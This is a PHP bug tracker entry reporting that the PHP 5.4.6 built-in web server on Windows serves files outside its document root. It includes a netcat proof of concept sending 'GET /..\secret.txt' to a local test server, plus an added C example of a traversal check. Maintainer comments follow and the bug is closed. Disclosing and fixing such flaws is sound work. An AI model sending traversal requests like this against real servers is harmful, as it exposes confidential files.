Bug #62883 PHP built-in web server - path traversal
Submitted: 2012-08-21 21:11 UTC Modified: 2018-05-14 00:20 UTC
From: krzotr at gmail dot com Assigned: mattficken (profile)
Status: Closed Package: Built-in web server
PHP Version: 5.4.6 OS: Windows XP
Private report: No CVE-ID: None
 [2012-08-21 21:11 UTC] krzotr at gmail dot com
Description:
------------
The PHP built-in web server is able to read a file outside the web server root directory

Test script:
---------------
C:\>type secret.txt
My secret password: 0123456789
C:\php>php -S 127.0.0.1:8080
PHP 5.4.6 Development Server started at Tue Aug 21 22:55:38 2012
Listening on http://127.0.0.1:8080
Document root is C:\php
------------------------------------------------------------------------------
C:\Documents and Settings>nc 127.0.0.1 8080
GET /..\secret.txt

HTTP/0.9 200 OK
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 30

My secret password: 0123456789
------------------------------------------------------------------------------
Server log:
[Tue Aug 21 22:55:56 2012] 127.0.0.1:25202 [200]: /..\secret.txt

Expected result:
----------------
Invalid request

Actual result:
--------------
My secret password: 0123456789
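
An added example, not part of the original report and not PHP's own code: a segment-by-segment traversal check run on the request path from the report, once splitting on '/' only and once also on '\'. The function names are hypothetical, and the slash-only variant is an assumption used to show how such a request could pass a check, not a description of PHP's actual parser.

```c
#include <stddef.h>
#include <stdio.h>

/* Walk the path segment by segment and track how deep below the document
 * root we are. Returns 1 if any ".." climbs above the root, else 0.
 * Assumption: `path` has already been percent-decoded. */
static int walk(const char *path, int backslash_is_sep)
{
    int depth = 0;
    const char *p = path;

    while (*p) {
        const char *seg = p;
        while (*p && *p != '/' && !(backslash_is_sep && *p == '\\'))
            p++;
        size_t len = (size_t)(p - seg);
        if (*p) p++;                         /* step over the separator */

        if (len == 0 || (len == 1 && seg[0] == '.'))
            continue;                        /* empty segment or "." */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {
            if (--depth < 0)
                return 1;                    /* climbed above the root */
            continue;
        }
        depth++;                             /* ordinary name */
    }
    return 0;
}

/* Splits on '/' only: "..\secret.txt" looks like one ordinary file name. */
int escapes_root_slash_only(const char *path) { return walk(path, 0); }

/* Splits on '/' and '\', the separators Windows accepts in a path. */
int escapes_root_windows(const char *path) { return walk(path, 1); }

int main(void)
{
    const char *req = "/..\\secret.txt";     /* request path from the report */
    printf("slash-only check: %d\n", escapes_root_slash_only(req));
    printf("windows check:    %d\n", escapes_root_windows(req));
    return 0;
}
```

On the report's request the slash-only check returns 0 and the Windows-aware check returns 1, which is the "Invalid request" outcome the submitter expected.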

 [2012-09-23 15:12 UTC] laruence@php.net
hmm, seems not reproducible on Linux, there may be something wrong in the httpd 
parser while on Windows.

anyway, the built-in server is targeted at testing and development purposes, so I think this 
is not that harmful :) 

thanks
 [2013-05-20 08:11 UTC] stas@php.net
-Assigned To: +Assigned To: moriyoshi
 [2017-10-24 06:33 UTC] kalle@php.net
-Status: Assigned +Status: Open -Assigned To: moriyoshi +Assigned To:
 [2018-03-10 13:42 UTC] cmb@php.net
-Type: Security +Type: Bug
 [2018-03-10 13:42 UTC] cmb@php.net
According to our security issue classification[1], this would not
be a security issue, since the built-in webserver is not meant to
be used on a public network.

[1] <https://wiki.php.net/security#not_a_security_issue>
 [2018-03-13 01:14 UTC] mattficken@php.net
An issue like this should probably be fixed regardless of policy.

But, I can NOT repro this issue on 7.2.2 on Windows.

I believe this issue was fixed a while ago.

Thoughts?

Otherwise, I will close this bug.
 [2018-05-14 00:20 UTC] mattficken@php.net
-Status: Open +Status: Closed -Assigned To: +Assigned To: mattficken
 [2018-05-14 00:20 UTC] mattficken@php.net
see previous comment
 